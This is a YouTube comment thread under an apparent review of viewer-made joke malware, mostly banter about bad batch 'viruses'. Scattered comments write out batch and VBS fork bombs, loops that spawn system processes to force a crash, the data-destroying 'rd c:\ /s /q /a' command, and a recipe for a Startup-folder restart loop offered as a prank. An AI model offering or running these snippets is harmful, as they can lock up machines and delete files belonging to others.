1 like@@klkkloreklffd iExpress is bat2exe integrated into Windows.
1 likeBat2Exe converter is no longer available on Internet.
Advanced Bat2Exe converter is not free
I love that lol
0 likes@@IMAGE_NT_HEADERS ?
0 likes@@klkkloreklffd thats what i mean. I use bat2exe advanced boi
5 likes@@api9259 No cuz like why use some unknown iExpress shit when u have bat to exe
0 likes@@klkkloreklffd ye
0 likes@@unknownaccount4783 Or just bat to exe?
1 likeYou could convert it to EXE with iExpress.....
10 likes@ActuallyØrb!t batch is easy
1 likeActuallyØrb!t lol ha ha ha
0 likesWhen someone tells me they learned how to code
610 likes"Are you sure about that?"
Replies (51)
@@barneytheolddogs944 its 4 you idiot u dont use reddit look an idiot
0 likesGTK is pain
0 likes@@Luka-he5mr not only html
0 likescss and js too
i am learning roblox lua
also,i learned how to use webgl
also also,i am learning 68k assembly
:a
0 likesStart
Goto a
@@KSPAtlas ok
0 likes@@MESYETI I made a fake captcha on the school computer in a vbs script and made it look like the recycle bin
0 likes@@capitalists1526 because i am creating an application through visual studio, i want to make a simple game and test my skills by myself only. not even 1/10th of it is finished
0 likes@@HouraisanShijuunana mastered it? What do you mean by that? Are you at the stage of making operating systems and device drivers? Or maybe making 3D graphics engines or emulators?
0 likes@@jonas9 get on my level i use brainfuck
2 likes@@eter9nitysslut131 yes, a good example for not-programming. I personally use Malbolge.
0 likes@@jonas9 batch ew
0 likesecho Hello, World
0 likes@@eter9nitysslut131 you can, to create models or guis but roblox can run it, c# is for my models (if it fail, i use lua) and c++ for gui (if it fail, i will try again but if i fail it again i will try to use lua to create roblox gui)
0 likes@@HouraisanShijuunana how many times do i have to tell you, c# and c++ DON'T work on roblox. Look it up ok?
0 likes@@eter9nitysslut131 c# can but sometimes it doesnt work for no reason at all, c++ can but it is kinda hard, idk how to create guis using lua
0 likes@@HouraisanShijuunana idiot i know what a gui means. You can't make guis with c++ and c#
0 likes@@eter9nitysslut131 gui means graphocal user interface which have some buttons, i am a simple roblox developer and i use c++ and c# for creating guis in my game. guis contain buttons that you can click and still use c++/c# (depends on what gui for the model [yeah, spawning the vehicle] i am creating)
0 likes@@eter9nitysslut131 i use c++ for guis in roblox cuz i dont know how to create guis using lua
0 likes@@HouraisanShijuunana specify what you mean by "gui"
0 likes@@eter9nitysslut131 i am not an expert but i can use c++ for guis in roblox, c# for guis too and lua for rblx
0 likes@@HouraisanShijuunana you also said that you ca use c++ and c# in roblox. I highly doubt you have any expertise
0 likes@@eter9nitysslut131 for me it is
0 likes@@HouraisanShijuunana its not easy to be mastered lool. It's what the os your using is built on. it only takes 2 to 5 lines to print hello world in c++ but in assemblyxx86 its 16 xD
0 likes@@eter9nitysslut131 nope that isn't, that's kinda old and is easy to be mastered, C++ is still hard
0 likes@@HouraisanShijuunana nope hardest is assemblyx86
0 likes@@barneytheolddogs944 lua is easy, try making a world in roblox studio and put some script from toolbox, C# or C++ is a good option for roblox (yes it can run) and watch some lua tutorials (5 mins to 10 mins)
0 likesYeah I only know html css and JavaScript because they are like linked languages I really wanna know Luabut I can’t
0 likes@@domokoa OHHHHHHH THAT'S POG!
0 likes@@HouraisanShijuunana yeah, i already learned how to make a lucky block mod. but yeah, i might continue java too.
0 likes@@domokoa oooooooh nice, maybe i will see u in the future making cool mods huh!
0 likes@@domokoa I think you mean Java, that's a big step lol. Well good luck with that one.
0 likes@@IWickDev i tried javascript last week for minecraft and it is good, but i havent really mastered it yet, i only know a few basics
0 likes@@HouraisanShijuunana yeah i started on java last week for minecraft coding, its pretty powerful. but i havent really mastered it yet to the point i can make cool stuff happen
1 like@@domokoa i recommend u python or java (java is used for minecraft) or for the hardest, C++ (i mastered it)
0 likes@@domokoa Its better than nothing and still teaches you everything you need to get started with another one. But one rule I like to go by is;
0 likesAll modern programming languages are powerful and can accomplish anything, just some of them are harder to get there than others.
I would suggest starting with Javascript or Python, both are very user friendly and have amazing community support.
i learned how to code but only in lua/roblox :(( but i do want to try to learn other types of coding languages
1 like@@MESYETI r/ihavereddit
0 likes@@tomikun8057 it’s actually 3
0 likesRantendo HTML is a markup language
0 likesI am dure About that
RandomHumanBeing True Haxor
0 likesYEAH WATCH opens cmd and types color a cd .. cd .. tree
2 likes@@tomikun8057 did you forget to use the space bar
0 likes@@MESYETI There is no joke I see. Maybe you wooshed yourself.
0 likes@@MESYETI r/wooooshwith4os also there's no woooosh tf u saying
4 likes@@MESYETI i don't see joke here, just some people trying to be funny
10 likes@@nil8659 woosh
0 likesI learned HTML codes.
3 likesI am sure about that.
When somebody tells me
16 likes"hey I made a virus for computers! Hehe"
I instantly know that they made a file with the .bat extension and it contains:
@echo off
:loop
start cmd.exe
goto loop
I don't want to like cuz 69 likes
0 likesIwick didn't think I'd see you here
0 likes"Yes."
33 likes"And what?"
"A messagebox, nice, i know it all doe!!"
I like how he has a Windows 10 wallpaper on Windows 7
352 likesReplies (21)
@@johnnygames927Enderman uses VMware not Virtualbox
0 likesIt was a built in windows 7 wallpaper
0 likes@@Stari.Swat99 VMWare?
1 likexD
0 likes@@eugene2870 was gonna say the same thing
0 likesdude i think hes on windows 10 he just themed it or something
0 likesIt's Ender man!😂
0 likesHe used VMware and copied the wallpaper from his Windows 10 host
0 likesStep 1 (Host)
0 likes[win key] + r
Step 2 (Host)
C:\Windows\Web\
Step 3 (VM/Host)
Drag and drop the image you want
but make sure you have VBox Addons
and drag and drop on
Step 3 (VM)
Right click and Set as Desktop Background
Done :)
@@hmwndp VMware workstation
0 likesI didn't notice that ._.
0 likes@@Stari.Swat99"wmware"
1 likeYou can search it in C:\Windows\Web\Wallpapers\Windows 10
2 likes@Alex Malmberg Its Called WmWare
0 likes@Alex Malmberg a "vm" or virtual machine
1 likeReally fits
2 likesI have that
1 likebecause it's cool
2 likesAeon true
3 likes@@michaelwlodarek5726 still. A good wallpaper ill give you that
10 likesIt originated in 7
18 likesEnderman: Lets see this fi-
448 likes2:47
Enderman: ( visible confusion )
Edit: aaahh, my comment before pandemic. ;)
Replies (15)
@@icecrownpoint RD stands for remove directory so it would just delete everything in that directory
1 like@@ILoveGTAV lol wasnt tryna flex ill take it down if you need me to
0 likesдод
0 likesок?
0 likesIm surprised the code even ran, truly! Im doing simple coding classes and wow-
0 likesthat moment clearly could have used a fart sound effect :P
0 likes@@realhumanbeing1714 Oh, thanks
0 likes@@icecrownpoint rd c:\ /s /q /a would delete every single file on your computer or at least try to
5 likesSorry, I don't know program code, commands, and what's it supposed to do.
1 likeCan someone explain?
rd C:\ /s /q /a
2 likesRestart -1
Echo
🤣🤣🤣🤣
XD XD XD XD
enderman: let's se-
0 likesrd c:\ /s /q /a
enderman: ō_ō
LMAO
1 likecode: echo restart 1
1 likei think that was the best part.
4 likesxD
3 likesThe dislikes are from the ‘hackers’ watching Enderman’s review to their ‘viruses’
98 likesReplies (3)
@@redm00n748 this comment was made before the dislike counter was hidden
0 likesUhh... I don't see any.
0 likesthats COOL
1 likeOk but the "Death Virus" was half decent and deserves to be called a virus, talking about a joke virus.
117 likesReplies (1)
Not a virus. Doesn't spread. Malware? Possible trojan? Maybe. Very fun one. Kinda cringy.
0 likesThat "Death Virus" malware did actually have effort in it, not gonna lie though.
102 likesheres some lethal malware: fortnite.com
65 likesReplies (10)
@@itsnathan9131yes
0 likesAh, yes. THE MOST DANGEROUS PANDEMIC SINCE COVID!
0 likesGross
0 likesfortnite bad minecraft good
0 likesfortnite is garbage
1 likeYes very letal more than all symptoms in Plague inc
0 likesThat’s some garbage malware
0 likes@yeet yeeter
0 likesKk0
@@mistergamergo1888
0 likesT
you master just achieved comedy
10 likes2:50 I'm laughing so HARD!!! 😂😂
43 likesReplies (5)
Me too man it is so awfully written😂😂
0 likes@@PixelGamer2_ ahh alr thx
0 likes@@charadreemurr49 oh i know now, "rd" means remove directory/folder, so its trying to empty the local disk
0 likes@@PixelGamer2_ idk, and idk why I posted this comment lol 🤷🏽♂️
0 likesWhat is happening then?
0 likes3:33 i love how he cringed at the awful system32 jokes
20 likesReplies (2)
Anxiety intensifies
0 likesI would cringe too
2 likesMy grandma installed malware from a site saying her computer is infected and it was a adware. I went into task manager, opened the flie location and opened the details and disabled the tree diagram. I then uninstalled it. The most stupidest malware out there and hackers.
8 likesReplies (1)
I don’t think your grandma derserves a computer if she that dumb god damn boomers
0 likesI remember making a batch program which loops
24 likes:start
start start start
goto start
I felt like hackerman
Bruh the cmd spam... i do it like every month in school
58 likesReplies (8)
@@juliaanimates9765 lol make sure you dont make the time smaller or many cmd's will spam faster and faster until your computer will lag and bsod
0 likesmy computer cmd spammed itself!
0 likesVery easy to make that
0 likes@@syc8066 use vbs
0 likes@@syc8066 Then use .scr files, only the extension is different
1 like@@syc8066 Then use batch
0 likesSince o csnt get cmd on school, i built a cmd emulator lol
1 likeSame
0 likes3:36 LMAOOO
121 likes“How much Joke malware would you like?”
98 likesEnderman: Да
Replies (19)
@@HKtitoOfficialii
0 likes66 likes xD
0 likes@@gdminervm True
0 likes@@HKtitoOfficial IT MEANS YES
0 likesOpen translator . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
It means no (da)
0 likesПривет! как дела?
0 likesI'm Russian
0 likesДа
0 likesit is Yes
0 likeslmao
@@darkraitycones5156 lmao
0 likesLmao
0 likes@@IcyColdified_ yes
0 likesI know what it says from playing Mario kart 7 in Russian for no reason
1 like@@showdown76 ok,thx
1 like@@wumbogt3310 it means "da", "yes"
7 likesdoes it mean "ya" ?
3 likes@@zigmas81 yeah this comment was from 1 month ago lol
1 like@@IcyColdified_ i think everybody knows
6 likesI'm not russian but I know what it means lol
2 likesBefore this video: oh another malwares, seems they are working in trash bin
61 likesAfter this video: I want to write malware in Java
Yo buisness
Replies (9)
@@osmineretro9591 java is your language
0 likes@@jonas9 what
0 likes@@osmineretro9591 you made java? kek
0 likes@@pravinrao3669 yeah because it basically packs the entirety of java along with it
0 likesI tried and was succesfull it is 500mb if only i knew making bat file i could have done it in 0.1mb
0 likes@echo off
0 likesecho Or use the superior language that all the kiddies use to make a cmd spam "virus"
Sorry to burst your bubble, but Java runs on JVM, which runs Java bytecode. Maybe you can do it by abusing JIT compiler of JVM (whatever that is), or you can use JNI (but you also need to use C/C++ with long Java_com_xxx and reflection-oriented mess, try to convert any functional Java code into JNI without referencing any compiled/bytecoded form of it ) Also, every OS has different APIs, so crossplatform "viruses" are out of consideration.
3 likesKek
0 likes@Black Hat because it's my language
0 likesHonestly thought the "death virus" was a well made attempt at a joke virus
13 likesTrash Malware
4 likesThreat Level 0.05 ~ 1
0.05: to broken malware that don't even work
1: to spamming command prompt boxes
Replies (3)
Threat Level 0.05 should be 0.000000 because they don't work
0 likes0.051 to even exist
0 likes0.8: to pranking you
0 likes3:12 it says reocver instead of recover
19 likesThe only useful thing I learnt from this video is that you can drag and drop a file into a running instance of Notepad to open the file!
22 likesReplies (1)
same lmao
1 likeSomeone: I made a virus hahahaha !!
11 likesEnderman: Did you mean trash?
:/
Replies (2)
These were really trash
0 likesI Confirm
0 likesYou are the Gordon Ramsay of Joke Malware. Keep it up! 👍
10 likes2:48 DON'T RD THE VM!!!
17 likesReplies (11)
Actually it's a real pc
0 likesUH OH the hackerman is gonna hack me in Scratch
3 likesWatch out guys, he's the hackman
6 likes@@Technology_2020 bruh
0 likesWhen you click on his profile picture you see he subscribed to five minute crafts and the other channels lamo xd
0 likes@@AresPro_ & @keybord person
1 likeThe username is clickbait
and when it says hack you
Nope its FAKE
ares 054 We're going to hack you...
0 likesJustAdam We're going to hack you...
0 likesKeyboard Person • 38 years ago We're going to hack you...
0 likes@@revelati_n its some dumb username from a clickbaiting YouTuber that clickbaited with that name. Can't believe ppl believes in it.
0 likesProject Zorgo I’m not even gonna ask about your username....
1 likeReminds me when I wrote a crappy trojan in batch script. Mine actually did damage though by disabling a bunch of Windows features with group policy by extracting a .reg file from its body and running regedit silently. I don't know why someone would think that a .bat file was similar to a .exe file when they are obviously different formats, nor would I upload anything I make to the internet for cheap fame. I'm not an expert, but I can write better batch scripts than most of the samples you've tested here. Many of these "samples" were created by people who probably only know like one command in the whole language.
18 likesAlso, if one is going to write any script, they should test it in a virtual machine.
Replies (1)
they might have mayhaps been youngins trying to get popularity, unsure
0 likesI really liked the command prompt one it reminds me of the small chance that if my pc boots up like 7 of those prompts pop up and dissapear
6 likesReplies (1)
Same
1 like2:00 that one is so easy to make
6 likes@echo off
:loop
start crash.bat
goto :loop
Save as “crash.bat” and enjoy.
Replies (4)
Or you could just
0 likes@%0|%0
@@PyPylia or yoU could do
0 likes:loop
Start
Goto loop
This can also be made so a message or a command can be reapeted
Such as
@echo off
:loop
Echo <message>
Start
Goto loop
And desktop deleter repeater
@echo off
:bbd
rd desktop :: Make sure your in your usernames folder, For example my name is melon and my username is melon
Start
Goto bbd
The cmd_spam.exe Was made by me back in 2017 lmfaooo
1 like:loop
0 likesstart %0
goto :loop
There fixed your code, now you can execute it from any program in any directory with any name, also @echo off isn't necessary for this as it doesn't matter if the user sees it or not.
to add to command prompt spam they should’ve made the program copy itself into windows startup folder then it would actually be a “virus”
7 likesReplies (1)
it takes long enough before startup folder programs to run that you can go to the folder and delete them
0 likesThe CMD spam takes really much RAM and it's impossible to kill with task manager. Only logout/restart
6 likesReplies (2)
@@jonas9
0 likesNo, once you realize you`re late the lag is extreme
Can't you just close all cmds in the taskbar?
0 likesThe death prank is probably the best made of these
2 likesThe only issue was our school computers were so shit that .bat files that would open loads of software could sometimes kill the PC, I don’t know how but it was funny af
5 likesIf I would make a Virus I would do a real one wich would has important things in it:
3 likes- Keylogger
- Encryption of all files (maybe) (and with decrypter)
- Replacing in reg edit the explorer with my virus (to not see explorer not come up it starts then explorer)
- Disabling CMD and Regedit
- And anti close (2 task system 1 task ded = System BSOD)
- And maybe more
DISCLAIMER : I WOULD NOT DO THIS AND IF ONLY FOR ENDERMAN OR PEOPLE WHO WANT STH LIKE THIS ITS NOT ON PURPOSE TO DESTROY COMPUTERS
should've added quotation marks in "malware"
42 likesReplies (10)
@@dominikr8797 obv not
0 likesDid you mean "question marks"?
0 likes@@kadergumus2598 Ummmm...
0 likesmalware
1 like@@badumtss4032 print('"'*230, 'malware', '"'*230, sep='')
3 likes"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" """""""""""""""""""""""""""""""""""""""""""""""""""""""""""" """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""malware"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" """""""""""""""""""""""""""""""""""""""""""""""""""""""""""" """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
3 likes@@badumtss4032 """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" malware"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
2 likes@@eenenormalei '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''MALWARE'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
3 likes@@malwaretestingfan yes double, cuz malware was even worse than normal
0 likes""malware""
1 like1:48 so thats how my laptop got infected
4 likesEndermans Name Is Andrew?
20 likesThe more you know
Enderman: reviews bad malware
1 likeMe: i thought malware was meant to be bad?
1:55 that is so simple to make just type this:
17 likes:start
start cmd.exe
goto start
Replies (9)
@@davidavilamoras2932 but how is it better
0 likes@@iwouldliketobelievethattha7561 i know
0 likes@@davidavilamoras2932 sorry for late response but that's the same code you just changed the label to BUCLE
0 likesbeter code:
0 likes:BUCLE
start cmd.exe
goto BUCLE
@@milk4lyfe lul
0 likes@@iwouldliketobelievethattha7561 rip your cpu
0 likesIs more fast in C#
1 like@@hendevofficial2442 yes you can i tried it. YEAH I TRIED IT ON MY ON COMPUTER!!
0 likesNah, because you can't open it THAT fast.
0 likes2:48 - Correct me if I'm wrong as I'm not well versed in batch commands, but "restart -1" doesn't even look like a proper batch command, so it would've had an error as a plain batch file, too.
2 likesReplies (1)
It is not a command to ever EXIST ;)
0 likesWaiting in Premiere, I'm excited! :D
25 likesReplies (1)
1 year ago
0 likesThe best "vIrUs ecks dee haha scary danger" I've made is a 3-line batch script that repeatedly opens terminals that ping google 10 times then exit. I made it to see how much I can cap my network connection, it went from 90mbps to 30. The real side effect though was that my IP was flagged as a botnet and I would get captchas for the next 6 months.
1 like2:52 Computer illiteracy made a virus EP.1
3 likes"Did you know you could just press the Windows key?"
2 likesEnderman: *Tries it*
The start of the video with automated english subtitles sounds like the start of a sitcom lmao
3 likes"YES, YES! IN YOUR FACE! I GOT- ah, nope."
1 like-Wheatley
one day i tried to change my account's name and i bluescreened the pc to this day i don't know why did it bluescreen the pc
6 likesReplies (2)
Maybe some kind of bug or someone hacked into your PC for pranking purposes and killed a system critical process like “winlogon.exe”.
2 likes@@mateo_hassan just bsod
2 likesMalware: Exists
0 likesVirtual Machines: Exists
Enderman: I need to download trash malware before I die.
2:47 Me, who knows nothing about batch files and coding, finds this hilarious.
18 likesReplies (3)
@@user-ze3ui8ur9h rd c:/ && del c:/*.*
0 likes@@dragoneater2008_ That command removes the directory and its contents. I still find it hilarious because it's absolute garbage.
0 likesYou can’t even delete c:/
0 likes2:48 The silence there hurts😂😂
1 likerd c:\ /s / q /a
4 likesrestart -1
echo
the humanity is what we think it is
Replies (1)
what is the single "echo" even supposed to output?
2 likesrespect the Death Virus creator for not putting crap in the code
1 likeWhy is nobody learning programming these days? It is so fun
6 likesReplies (7)
i am
0 likesI can't decide on a language
0 likesWell im learning
0 likes@@兽Arufisu Bash is not a programming language it's actually a command prompt in linux but you can make scripts for it with the #!/bin/bash tag at the beginning of a new file
1 likePaul. bash is the best for linux n vbs is the best for windows
0 likesliterally every 13-year-old: I AM LEARNING HTML BROO!!!
1 likeagreed
0 likesAt least death virus had some effort put into it lol
1 likewe need to make a recycle bin virus
8 likeswhen you put a trash virus into it, the recycle bin will destroy your pc
Me: See Club Penguin dance.
1 likeAlso me: Its Watch time
0:17 was kinda funny and I mean the text
2 likesDUDE RIGHT WHEN HE OPENED THE INSTALLER.EXE MY ENTIRE COMUTER FROZE FOR 30 SECONDS THEN STARTED WORKING AGAIN. THE TIMING WAS CRAZY
1 likeReplies (2)
@@_roman420_old_acc2 its a shitty laptop I use because my mom works from home with my main pc so probably
0 likesmaybe something with the harddrive, or a memory failure?
0 likes2:11| Seeing all those command prompts fills you with determination
5 likesReplies (2)
me, a person with undertale
0 likesah yes, a man of culture.
Nice undertale vibes.
0 likes2:48
6 likes.... HOW DID THEY MESS UP THAT BAD!? YOU'RE SUPPOSED TO PUT @echo off
THEN YOU DO UR STUFF AND THEY DIDN'T EVEN SAVE IT AS A .bat FILE
Replies (2)
@@otherkrabs Yeah, but all commands will be printed out which looks pretty terrible (unless you prefix all commands with @)
0 likesYou don't need @echo off.
1 likeI want to download death virus, can u give me the download link plz?
1 like2:49 I’m dying lol
5 likes2:47 I found the funny
0 likesTHE MUSIC STOPPED LMAO WHEN THE DUDES VIRUS SHOWED on the notepad KEKW
2:47 Holy shit i cant stop laughing 😂 😂
6 likesReplies (3)
@@poobie_ No it doesn't. That's the funny part. First, it sends an error that you can't delete it because access denied. Next it runs the "restart" command.... Which doesn't exist. Then it outputs an empty line to the screen. And exits immediately. So even if you renamed that .exe file to a .bat, it actually wouldn't do anything to your computer.
0 likes@@fedecatmew417 It basically deletes everything and shuts down lol
0 likesWhy? I didnt understand
0 likesThe fact that it said *Human-Like* note in the end of the DEATH virus is nice. You dont need to freak out
1 like3:19 nope
6 likesWe all wrote a cmd-spam batch at one point.
1 likeEnder: please go back to Drive Slow intro
18 likesReplies (1)
Riot Yes, please!
0 likesI only use batch for PoC mainly because you can do a lot with it, and it’s super easy to write but my main language is c++ and c#
1 like3:57 Send me the .NET project file!
13 likesReplies (1)
Why would you want that shit?
0 likes“Wanna cry” wants a challenge
1 likeWhy is this in my recommendations
3 likesBasiccally this is the whole stuff at my Trashbox.
0 likesnonnononono i clicked om it when it had 333 views
18 likesReplies (3)
psap
0 likesWhat's so bad about 333
0 likesSo be glad it wasn't 666 views
0 likes3:36 Maaan this greenscreen edit...
1 likeIt destructs me
4:02 The icon does not even look like Windows 2.0
3 likesReplies (1)
It is the win 3 icon indeed
1 likePlease make another one of these videos, I found it very funny.
5 likes"Its working on win 10 only!"
1 likeEnderman: so anyways i put it in a win 7 machine
on error resume next
6 likesset t=createobject("Wscript.Shell")
t.run"cpuheater.vbs"
t.run"cpuheater.vbs"
Save this as "cpuheater.vbs"
Replies (4)
@@chel_tyi я только сейчас это узнал :/
0 likesНе надо писать по английски ему. Он и так понимает русский. Он сам из России. Это написано в о канале.
0 likesOn Error Resume Next
0 likesDo
CreateObject("WScript.Shell").Run WScript.ScriptFullName
Loop
Replace t.run"cpuheater.vbs" to t.run(WScript.ScriptFullName)
0 likesThat should allow it to be executed from any folder (like in CMD or something) or even different names [Note: Haven't tested it, probably doesn't work, I can't be bothered to start up my VM for that garbage]
Installer.exe maker after writing a crappy batch code and changing it's extension to EXE be like: "OMG I MADE A REEL VIRUS!!1!1!!!!"
1 likeExecutables contain Binary code, not raw Batch.....
After 2 years you finally tried it 😂😂
3 likes"Pls stop me sending garbage" But thats what makes these videos funny
0 likesYou: everyone calls everything a virus
3 likesMe: I Don't.
The Most satisfying thing in windows. CMD spam
0 likesis it okay to say that this video is trash
16 likeseven though its awesome?
Replies (2)
But it's not polite
0 likesOf course.
0 likesWhat if we call these types of malware: "Trashware"
1 like1819: In future we will have future cars.
4 likes2019: Trashed malwares
Replies (1)
in future we will have future cars.
0 likes.....in 1819 i dont think they were talking about this
...
woooosh me
Who writes their viruses in .NET? That's like making it hard for someone to run your virus in the first place. Use c++...
2 likesReplies (1)
It makes it easier to crypt the virus to make it more undetected
0 likesmy braincells
5 likeswhere can I get the death virus? I want to prank my friend with it.
2 likesдоска позора
6 likesReplies (2)
Я не знаю, о чем они говорят, но я не знаю русскую часть, я использую переводчик Google
0 likesHabibi
0 likes"Professional" coder: I'm gonna end this whole man's career
0 likesEnder: no u
0:21
7 likesНикто:
Абсолютно никто:
Русские: А из какой страны автор?
Replies (3)
Вхвх
0 likesИз какой-то латинской страны
0 likesУниверсальные читы))
1 likeI bet some kid probably cried when he saw that you called his malware trash.
1 likeЛОООЛ "Универсальные читы" xD 0:18
4 likesReplies (3)
Перуанская калла
0 likes@@Octol1ng откуда вы вообще появляетесь, чуть ли не все знают что он русский
1 likeПФФФФФФ, НУ ЗАШИБИСЬ. ТУТ ОКАЗЫВАЕТСЯ ЕСТЬ РУССКИЕ. ДА ЕЩЁ И С ЮМОРОМ.
1 likeThey: THIS IS REAL VIRUS
0 likesEnderman: PLS STOP WITH THIS TRASH
This is my most favourite (favorite) video on your YT channel! 😃😘
0 likesi would like to know what that MediaFire link was to that Death Virus thing, i would want that for personal use only.
2 likesDo you have a link for your Discord server?
1 likeCMD_Spam is like Notepad Rape but with CMD instead
1 likeI love how restart isn’t even a command you have to type shutdown /r /t 0 to restart with cmd
0 likesis your name andrew, Эндрю or is that just a random name you wanted the computer to be named?
1 likeby the way the russian is google translated
Replies (1)
i think in Discord his nickname was Andrew
0 likes1:30 ah yes, lets just store the entire system on my desktop
1 like1:48 i laughed so hard LMAO🤣🤣
1 likeVirus creator: okay were gonna make this not such a bad virus but still make it affect the computer
0 likesMe:*if your gonna make a not harmless virus then just make it a application*
virus creator: *confusion*
Enderman: ..Please stop sending me garbage :(
0 likesPeople: Evil laugh intestifes
The Virus at the last saying it was a prank
0 likesMy friend: My Death was already defined
2:45 The junk that left the music speechless.
0 likes2:47-THAT MOMENT...I LIKE IT!
0 likesrip Creator
“Windows 10 Virus”
0 likesEnderman: WINDOWS 7
The installer.exe was crap, but frikin hilarious I couldn’t stop laughing
0 likesTHANK YOU FOR GIVING ME THE VIRUS VIDEOS
0 likesPffff imagine that some time into the future all kinds of viruses and malware that can attack Windows XP/7 will not be able to work because it simply can't run on such old operating systems!
1 likeCan i have link for Death one?
2 likesI genuinely felt the pain at that last text.
0 likesPoor Enderman.
Make trash malware 2 please this was so good
1 likeIdk why codes are so hard to learn, can people make them like it?
0 likesStart
Get_up(from_bed)
Go_to(kitchen)
Sit_in(chair)
(If_no_food_(go_to_Start))
(If_food_on_table)
Start_eating
Take_spoon
Eat
Go_to (Start_eating)_repeat_10_times
Go_to(bed)
Start_sleeping
Sleep
Sleeping_until_mom_cooks_food
Mindyobusines could have at least used RTLSetProcessIsCritical
1 like0:24 is this siamalam under the selected file ?
2 likesAren't We Gonna Appreciate How Many Times This Guy Has To Install New Windows?
2 likesvery toxic but nice video also u said sorry in desc most youtubers i know would not do that keep up the good work!
0 likesThis guy can make the most powerful malware possible im telling you bro
0 likesI have an extremely annoying virus, Create a batch file and do a script to move it to the startup items folder, then do the taskkill command for “explorer.exe”. This will break their computer and force them to restart, but when they log back in, it just forces them to restart again! I recommend cu try it! ;-; also don’t forget to do /IM, /T and /F. Anyone who uses this script please give me some credit!
1 likeReplies (1)
Seriously, don’t do this on ur real PC. Instead make sure your VM is completely sandboxed and run the batch file.
0 likesWhen I was a kid I was trying to learn cool code stuff and in a CMD snake tutorial someone made me make the CMD spam lol
1 like3:36 oh my god im still safe
0 likesi liked the death virus nice video haha
2:48 damn must've taken him like 3 centuries
0 likesDeath Virus should have lowkey just ended at "System32 was corrupted. Please restart your PC." ngl
0 likesTop 2 working .bat
0 likesvisusesgarbages:1) :x
start explorer.exe
goto x
(Epilepsy alert, lags alert)
2) :x
start wininit.exe
goto x
(-Program- garbage starts system procces which already exists, and this causes Windows to close one of them and activate BSOD trigger.)
Replies (1)
Idk how to put programs in autorun using CMD.
0 likeshow u got like in the application and the upper border where is X minimize and these how ur buttons like closeing (X) button is connected to the up and its big? i have windows 7 ultimate as well and the buttons are like wide square boxes that are not ''connected'' pls help and how to get blue theme color in windows 7 please do tutorial for me
0 likesThe background music brings lots of my cool memories ❤️
0 likesGot an antivirus ad
1 like1:48 reminds me of when i was making a batch file to open winver, instead, it spamed cmd prompts
1 likeReplies (1)
Rip
0 likesAnd this is like a teaching video of how to make good malwares
0 likesThe cmd spam code is
1 like:1
cmd
goto 1
Then save it as a batch file and use .bat to .exe
We can download the "Death Virus" ?
1 likeThe 3rd malware would make my computer go insane
0 likesBluebooter : i support win10 ok?
0 likesMe with win 7 : ok but why
This reminds me when some people wanted to be in dannoct1 video sending garbage "bat viruses" for their Viewer-Made Malware videos
0 likesReplies (1)
Good old series. Even them were still fun.
0 likesalternate title: enderman roasts his fans
1 likeHow to remove Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a in Windows?
1 likeIn the Computer classroom at school I crashed 1 computer randomly opening a lot of CAD'S windows
0 likesEnder how can I send you my program? (This time not virus, only fun program, I tested it and it works, I made it in C#)
0 likesAm I supposed to just put download link in the comments or how?
1:48 collabvm in a nutshell
1 likeSince u don’t want us sending batch files or bat2exe what should we send and is it ok if we send batch/bat2exe if we test it and it works?
0 likessimple way cmd spam was made:
0 likesit would be probably made in bat2exe and code is:
:loop
start cmd
goto loop
You use bridge or nat Network to try these viruses?
0 likesI didn't know these channels still existed, with the ncs music and notepad.
0 likesFor anyone who can't use virtual machine, use any.run :)
1 like3:36 oh my dude you just got pranked
0 likesMe, a normal dude programming random things: maybe I can program a virus too... but im only gonna make in work in windows 10 8301, never gonna test it, write it in a programming language I suck at, make it like 5 lines big and send it here
0 likesSome of these "viruses" i seen for videos with name "HOW TO WRITE VIRUS IN NOTEPAD!'
0 likesme: sees video
0 likesalso me: creates batch malware on windows xp vm
How can i do tht like u? I think you can make the timeline into parts and all part has its own name. How can U do that?
0 likesIn the death virus how to you code so that when you run it it changes your wallpaper?
0 likesFinally a malware video with actual music
0 likesWhat music did you use?
0 likes0:31-0:36
1:07-1:16
1:40-1:44
2:24-2:29
2:55-3:00
3:47-3:52
Replies (2)
Otto Cray was used
0 likes@@thatpsfan2511 No, I was talking about the music that was used for the comments.
0 likesCan you give code of CMD Spam?
1 likeI got an antivirus ad before watching this...
1 likeReplies (2)
so did i
0 likesLol
0 likes3:56 Running as administrator didn't work :(
1 likeDo you use a vm and if so does a virus transfer to your main pc
0 likeshey enderman give me the link to windows 2.0 upgrader
0 likescool idea: malware that opens toy are a idiot (harmful version) upon startup
0 likesHey where can I send you something like this??
0 likesHow can I make viruses?
1 likeThe only "virus" I can make without searching for it is a little thing in notepad that counts down from 3 and literally just shuts your pc down. But at least it is something :/
0 likesIf there is a file type, there always will be shovelware of it.
0 likesReminds me a lot when I used to create fork bombs on the school computers and disguised them as a shortcut.
0 likesI still cant believe my toy enderman would do this...
0 likesim gonna make my own virus in batch and see how much damage a batch file can possibly do
0 likeshow can i get the death virus
1 likeMe: has stayed up til 1
0 likesMe: I have won.
My brain: but at what cost?
Me: my sleep.
"Windows 2.0 Upgrade"
0 likes2.00 = doesn't exist
2.01 = doesn't exist
2.02 = doesn't exist
2.03 = 16-bit DOS version of Windows from 1987
This gave me inspiration
2 likesYo dude this content is amazing continue the amazing work!!!!!!!!
0 likesThought I was the only one "General S hettings...for the S het"
0 likes*proceeds to put malware in recycle bin*
0 likesIt did not work. Now the computer is calling me trash.
0 likesT'he ,,Death Virus,, Is at least nicely made
0 likesReplies (1)
what did you expect from a stolen comment
0 likesNone were viruses, they didn’t spread or infect files.
1 likeOnce I wrote a python program that just spam-opened new tabs
0 likesOh my god, It's the malware of my species.
0 likesDeath Virus.vbs
1 likeInputbox "Enter Password"
Wallpaper Virus Paint.png
X=Msgbox ("Prank")
Death Virus.bat
echo deleting files...
echo This won't take long...
